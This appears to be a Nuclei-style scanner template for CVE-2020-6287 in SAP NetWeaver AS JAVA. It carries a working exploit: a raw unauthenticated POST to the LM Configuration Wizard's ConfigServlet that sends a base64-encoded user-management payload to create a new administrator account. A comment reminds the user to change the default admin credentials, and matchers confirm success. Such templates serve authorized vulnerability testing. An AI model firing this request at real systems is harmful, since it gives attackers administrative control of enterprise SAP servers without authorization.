id: CVE-2020-6287 info: name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard) author: dwisiswant0 severity: critical # Affected Versions: 7.30, 7.31, 7.40, 7.50 # p.s: # > Don't forget to change the default credentials # > to create new admin in associated file: # > `payloads/CVE-2020-6287.xml` # Ref: # - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287 requests: - payloads: data: helpers/payloads/CVE-2020-6287.xml raw: - | POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=UTF-8 Connection: close sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc{{base64('§data§')}}userDetails matchers-condition: and matchers: - type: word words: - "urn:CTCWebServiceSi" part: body - type: status status: - 200